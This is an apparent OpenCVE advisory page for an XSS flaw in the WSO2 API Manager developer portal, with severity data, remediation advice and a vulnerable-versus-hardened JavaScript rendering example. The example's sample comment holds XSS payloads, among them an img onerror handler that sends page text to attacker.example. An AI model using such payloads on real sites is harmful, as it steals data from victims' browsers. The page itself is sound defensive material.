Description
The WSO2 API Manager developer portal accepts user-supplied input without enforcing expected validation constraints or proper output encoding. This deficiency allows a malicious actor to inject script content that is executed within the context of a user's browser.

By leveraging this cross-site scripting vulnerability, a malicious actor can cause the browser to redirect to a malicious website, make changes to the UI of the web page, or retrieve information from the browser. However, session hijacking is not possible as all session-related sensitive cookies are protected by the httpOnly flag.
Published: 2026-04-16
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting that permits malicious script injection, UI manipulation, and information retrieval in the user’s browser
Action: Patch
AI Analysis

Impact

The vulnerability stems from the WSO2 API Manager developer portal's failure to enforce proper validation and output encoding on user‑supplied input. Injected script content executes within the victim's browser context, enabling attackers to redirect the browser, modify the portal's user interface, or extract data rendered into the page. The httpOnly flag on session cookies keeps script from reading them, so the session cookie itself cannot be exfiltrated; it does not stop injected script from acting inside the victim's authenticated browser session, so the attacker's reach is whatever the portal exposes to that browser, rather than the cookie.

Affected Systems

The affected vendor is WSO2 and the affected product is WSO2 API Manager; the weakness is in its developer portal. The CVE record on this page carries no affected-version range, so treat every API Manager deployment as affected until it has been checked against the version and patch information in the vendor advisory linked under Remediation.

Risk and Exploitability

The CVSS 3.1 base score of 5.4 is medium severity; the EPSS probability shown on this page is below 1% (very low), and the vulnerability is not listed in the CISA KEV catalog. The vector recorded for the CVE (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) says the attack is network-reachable and low-complexity, requires a low-privileged account (PR:L), such as a registered developer-portal user, and requires a victim to interact with the injected content (UI:R); scope is changed because the script executes in the victim's browser rather than in the vulnerable portal component. The description does not identify which portal input is affected, so any field whose value the portal later renders to other users should be treated as a candidate until the vendor advisory is consulted. Because session cookies are httpOnly, an attacker cannot read the session cookie, but injected script still runs with the victim's view of the portal and can redirect the browser, alter the UI, or read data rendered into the page.

Generated by OpenCVE AI on April 17, 2026 at 03:27 UTC.

Remediation

Vendor Solution

Follow the instructions given on https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3391/#solution


OpenCVE Recommended Actions

  • Apply the vendor‑supplied patch following the instructions in the WSO2 security advisory linked above.
  • Validate constrained inputs against an allow-list on the way in, and encode every user‑supplied value for the context it is rendered into (HTML text, attribute, URL, or JavaScript) on the way out; validation alone does not cover free‑text fields such as descriptions or comments.
  • Deploy a Content Security Policy that restricts script sources and excludes 'unsafe-inline' from script-src as defence in depth; it limits what an injected script can do but does not replace output encoding.
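The following is an added example, not WSO2 API Manager code and not taken from the advisory: a render function with the defect the record describes (user‑supplied content placed into HTML with no encoding) beside a hardened version that allow‑lists a constrained field on input and encodes free text per output context, which is the control the first two recommended actions call for. The comment fields, the payload and the function names are constructed for illustration and do not reflect the portal's actual templates or fields.

```javascript
// Added example (not WSO2 or OpenCVE code): the rendering defect this CVE
// describes, untrusted portal content concatenated into HTML without output
// encoding, next to a hardened version that validates on input and encodes
// per output context. The comment object and its payload are constructed.

// Input validation for a constrained field such as a display name: allow-list
// the characters the field legitimately needs and reject everything else.
function isValidDisplayName(value) {
  return typeof value === 'string' && /^[A-Za-z0-9 _.-]{1,64}$/.test(value);
}

// Output encoding for HTML text content: the five characters that can change
// HTML structure become character references. Free-text fields (comments,
// descriptions) cannot be allow-listed, so encoding is the real control there.
function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Output encoding for a quoted HTML attribute value: everything outside
// [A-Za-z0-9] becomes &#xHH;, so the value can neither close the quote nor
// smuggle in an event-handler attribute. The u flag keeps astral characters
// as one code point instead of two surrogates.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu,
    (ch) => `&#x${ch.codePointAt(0).toString(16)};`);
}

// Vulnerable: the pattern the advisory describes. Whatever the author and body
// contain lands in the markup verbatim.
function renderCommentVulnerable(comment) {
  return `<div class="comment" data-author="${comment.author}">${comment.body}</div>`;
}

// Hardened: each value is encoded for the exact context it is inserted into
// (attribute value for data-author, text content for the body).
function renderCommentSafe(comment) {
  return `<div class="comment" data-author="${encodeForHtmlAttribute(comment.author)}">`
    + `${encodeForHtml(comment.body)}</div>`;
}

// Constructed sample: an attribute break-out in the author field and a
// script-bearing tag in the body. The body payload reads page text rather than
// document.cookie: with httpOnly session cookies, as the advisory notes, the
// cookie is out of reach, but whatever the page shows the victim is not.
const SAMPLE_COMMENT = {
  author: 'x" onmouseover="alert(1)',
  body: '<img src=x onerror="fetch(\'https://attacker.example/?d=\'+encodeURIComponent(document.body.innerText))">',
};

console.log('vulnerable:', renderCommentVulnerable(SAMPLE_COMMENT));
console.log('hardened:  ', renderCommentSafe(SAMPLE_COMMENT));
console.log('author passes allow-list:', isValidDisplayName(SAMPLE_COMMENT.author));
```

Run with `node`. In the hardened output the author value can no longer terminate the attribute and the body's `<img>` is inert text, so the browser never sees a tag or handler to execute; a Content Security Policy, the third action above, sits behind this as a second layer for the case where an encoding step is missed.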

Generated by OpenCVE AI on April 17, 2026 at 03:27 UTC.


Advisories

No advisories yet.

History

Thu, 16 Apr 2026 13:15:00 +0000

Type             Values Removed   Values Added
Metrics (ssvc)                    {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 16 Apr 2026 11:45:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Wso2
                                      Wso2 Api Manager
Vendors & Products                    Wso2
                                      Wso2 Api Manager

Thu, 16 Apr 2026 10:15:00 +0000

Type                 Values Removed   Values Added
Description                           The WSO2 API Manager developer portal accepts user-supplied input without enforcing expected validation constraints or proper output encoding. This deficiency allows a malicious actor to inject script content that is executed within the context of a user's browser. By leveraging this cross-site scripting vulnerability, a malicious actor can cause the browser to redirect to a malicious website, make changes to the UI of the web page, or retrieve information from the browser. However, session hijacking is not possible as all session-related sensitive cookies are protected by the httpOnly flag.
Title                                 Cross-Site Scripting via Developer Portal in WSO2 API Manager Enables UI Modification and Information Retrieval
Weaknesses                            CWE-79
References
Metrics (cvssV3_1)                    {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


Subscriptions

Wso2 Wso2 Api Manager
MITRE

Status: PUBLISHED

Assigner: WSO2

Published:

Updated: 2026-04-16T12:30:42.568Z

Reserved: 2024-05-14T12:13:06.529Z

Link: CVE-2024-4867

Vulnrichment

Updated: 2026-04-16T12:20:03.408Z

NVD

Status : Awaiting Analysis

Published: 2026-04-16T10:16:13.893

Modified: 2026-04-17T15:38:09.243

Link: CVE-2024-4867

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-17T03:30:08Z

Weaknesses